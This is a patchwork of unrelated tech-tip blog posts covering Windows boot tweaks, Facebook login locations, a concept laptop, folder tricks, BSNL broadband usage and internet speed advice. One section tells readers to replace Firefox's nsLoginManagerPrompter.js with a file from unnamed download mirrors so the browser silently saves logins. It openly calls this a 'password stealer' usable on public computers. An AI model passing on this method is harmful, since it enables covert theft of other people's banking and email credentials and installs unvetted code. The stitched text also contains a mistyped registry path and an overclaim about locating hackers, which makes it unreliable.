If you wish to resolve this issue with startup speed then there are steps that can be undertaken to solve it.

You can do the following steps will help in speeding up windows 7 boot up:

1. Press Start and reach Search programs and files

2. Type regedit and press enter, in the UAC window press Yes

3. In the registry, locate this subkey: HLKM\ SYSTEM\ CurrentControlSet\ Control\ SessionManager\ MemoryManagement\ PrefetchParameters

4. Look for the EnablePrefetcher and click it

5. Set the value to 2 and press ‘Ok’

6. Look for Enable Superfetch and click it open to set the value to 2 and exit

The next thing you would like to know is about the source that has hacked your account. This article is an effort to let you know about the Facebook feature in the security settings that help you to know about the hacker.

Below mentioned are the simple steps that you need to take to get hold of the hacker with complete details of his whereabouts:

First of all log on to your Facebook account and click on ‘Account’ appearing on the right most at the top of the page. Click on ‘Account Settings’ from the drop down list that appears.

Sometimes, the settings look different from the way that it has been referred above. Your setting may not look similar to what you had seen during your last visit to the page. In that case follow the below mentioned steps:

• Go to the ‘My Account’ page
• Now scroll down to ‘Account Security’
• Now click the ‘Change’ link appearing in the list.

However it does not show the IP address but it shows the geographic locations of those computers used to log on your account. The login details used to login for websites in firefox could be made to save them automatically by just altering some stuffs in the firefox. Firefox being a opensource product makes one get the source codes of the application easily and just a change in them can create big differences on many aspects.

The login details used on firefox made to be auto saved can be used for phishing purposes easily so beware while logging to sites via firefox when it is done in public computers as one can easily loose their login details be it of online banking, emails or any other stuff which in other words ones loss can be to any extent depending on the sites login details the person lost.

This method can also be used for personal benifits like one getting the login details saved automatically in the browser without getting asked everytime to save it. This can be pretty handy for people who use huge amount of different login details on their secured personal system/laptop.

just follow the below steps for this hack to work so that firefox starts saving login details used through it automatically and in other words which make it password stealer.

Locate the file named nsLoginManagerPrompter.js in the installed location of the firefox. ex : C:\Program Files\Mozilla Firefox\components
Download this file (mirror1 or mirror2) and extract the rar archive and then replace the extracted file with this file nsLoginManagerPrompter.js whichis present in installed firefox location.
This will start saving the passwords automatically in firefox.

The saved passwords can be accessed just like the normal way one can see the saved passwords in firefox i.e Tools »> options »> security tab »> saved passwords »> show saved passwords »> yes.

Back in 2009, more than a few people drooled over a concept video from Orkin Design for a laptop with a flexible screen that rolls up into a magic scroll of sorts.

The Munich-based design firm recently released an updated concept video, but the Rolltop is so far no closer to becoming reality.

The Rolltop 2.0 is envisioned as having a flexible OLED (organic light-emitting diode) multitouch display (perhaps similar to Sony’s) that can be used as a 13-inch laptop screen or full 17-inch monitor with a stand attached to the device.

When it’s not being used, the screen rolls up into an 11-inch tube. It curls around a base tower that houses a Webcam, loudspeaker, and detachable power supply and cable that doubles as a shoulder strap. Check it out in the vid below.

The designers say they weren’t thinking of making Rolltop into a product at first, but were so delighted by the warm response their concept received, they decided to move ahead with it.

They’re now looking for partners and donations to help their cyberscroll see the light of day.

1) Firstly, create a new folder

2) Right-click on the newly created folder and from the the menu select Rename option.

3) Hold Alt key and press 255 in ur numpad and then press Enter key. You will see a blank folder name for that folder.

3) Again right-click on that folder and select Properties.

4) From the properties window, select Customize tab.

5) Select Change Icon form the Folder icons part.

6) Now, select a blank folder icon form the Change Icon for Folder window.

7)Click on OK button.

8) Again, click on OK button of the folder properties. U r done!!

Folders with name: CON, PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5,
COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, & LPT9
cant be created using Windows Explorer or Command Prompt directly! ( Try this
out.. right click on your desktop and try creating folder named “con”it changes
back to “new Folder” or its not created )

This is prevented as windows os terms these folders as SYSTEM Folder Names reserved only
for the Operating System…..

1) Check current BSNL Broadband usage online

You can check the dataone broadband usage directly at BSNL broadband usage portal website.

Go to this page

Login with your portal id and password. If you dont have portal id and password, get it by contacting your BSNL Broadband customer care. Phone no 1800-424-1600.

After logging in click on View your Postpaid usage or Prepaid usage based on your dataone broadband plan.

Select Service Broadband

Then select the month to know the your broadband usage

2)Get free BSNL broadband usage software

Download this software from here and install. This software uses the BSNL broadband usage site data, so you need to have portal id and password.

3) Get the BSNL Broadband usage- weekly alert by SMS

These alerts will warn you when you cross your Broadband usage limits.Otherwise it sends your usage once in a week as SMS. I use this service and it is good to know the broadband usage to control myself.

Do you have a right connection for your requirements?
It is very important to select the right connection for your needs in order to enjoy a faster internet connection. If you are a person who just uses the internet for basic email, web browsing, facebook and occasional youtube, you may not need an unlimited usage connection. In this case it’s better to go with a limited download usage (4 to 5 GB is more than enough) and a high speed connection.

If you are the person who downloads media files a lot it’s better to go with an unlimited / unmetered usage connection. Get the best speed that your budget permits.

Is your Internet Service Provider (ISP) actually delivering you the speed you are paying for ?
This is critical. Get what you are paying for. You need to keep checking for your internet speed from time to time. Many times the ISPs only deliver 50 to 60 percent of the speed promised. Recently I asked one of my friends to check his speed for his 1 Mbps line. He was getting on an average only 600kbps. When he raised the issue with his ISP, his connection speed was fixed. You can check the speed of you internet connection using following websites:
– speedtest.net
– testmyspeed.com
– mcafee.com

Check Auto-Updaters for the softwares installed:
Auto-update of the installed software like Java, Windows, Adobe etc can run in the background while you are browsing and make the internet feel slow for you. Best way is to switch off the auto-update for softwares and windows. We have already written about how to disable adobe updater in one of our earlier posts. You can run these updaters manually as and when when required. Another good way is to schedule these updates to download updates during the time your may not be using your computer.

Use good and light weight Anti-virus and anti-spyware software:
Your PC can be infected by viruses, malware and/or spy wares which will not only slow it down but also affect your internet connection by utilizing it for their own purpose without even your knowledge. They can potentially download or upload huge amounts of data from your system making your connection really slow. Two of the best anti-virus software are:
– Avast
– Kapersky
– You can also use Windows Defender (which comes with Windows Vista and Windows 7)
Avoid using Norton or Symantec Anti-virus as they can really slow your system down because they utilize a lot of system resources (RAM).

Use download Managers for large files:
If you have to download large files, say about 20 MB or more, always use a File Transfer / download manager. There are many free options available like FlashGet / Free Download Manager (FDM) / Internet Download Manager (IDM). If you use rapidshare to download files from the internet, then you can use one of the free rapidshare downloader to download the files while the connection has a comparatively lower level of pressure.

User Better Browsers:
Firefox and Chrome are much better browsers to use compared to Internet Explorer. They process HTML/Java/Javascript, faster and hence render pages much faster that Internet Explorer. Firefox and Chrome also have good memory management and rarely hang. You can use Opera which is also a good option. Over all if I have to recommend one browser, I will go with Google Chrome.

Keep your system(PC) fast and clean:
Many a times it’s not the internet but your system that is slow. To keep your system running fast, do the following maintenance tasks periodically:
- Disk Cleanup
- Clear cache of all your browser
– Disk Defragmentation
- Full system scan from your anti-virus
- Update your windows and other frequent programs (if you set auto-update to off)
– Uninstall all the unnecessary programs that you may have installed

BEWARE! Avoid softwares which claim to increase your internet speed:
There are many softwares available on internet which claim to increase your internet speed by changing TCP / IP, Winsock and other internet settings. Most often than not these will harm your system or change your internet settings in a way that your internet connection will stop working. Avoid these at all costs.

Avoid browsing on VPN to make internet connection faster:
If you have a office VPN, use it only for your official work. Avoid browsing on your office VPN. When you use a VPN, your entire data flows through it, and it can get slow if your office servers are slow or if they have too many concurrent connections. So for non work related browsing, it is a good idea to browse without the VPN connection. BTW, have you seen the free VPN service that we have talked about in the past?

Use OpenDNS (Only for the more technically inclined):
Many times the ISPs do not maintain their DNS servers properly. As a result their DNS servers get overloaded or experience other technical problems. They may take a long time to respond to lookup requests or they may not respond at all. Sometimes when your Internet connection seems to be down, it may be fine but it may simply appear down because your ISP’s DNS isn’t working properly.

To avoid this, you can OpenDNS as your DNS service instead of your ISP’s DNS. I have used OpenDNS and found it really good. My internet connection seems to be more stable and robust. (Note: Using OpenDNS, will not increase you internet speed, but it will reduce to downtimes or ‘server not found’ scenarios). ReferOpenDNS.com/ for more details.
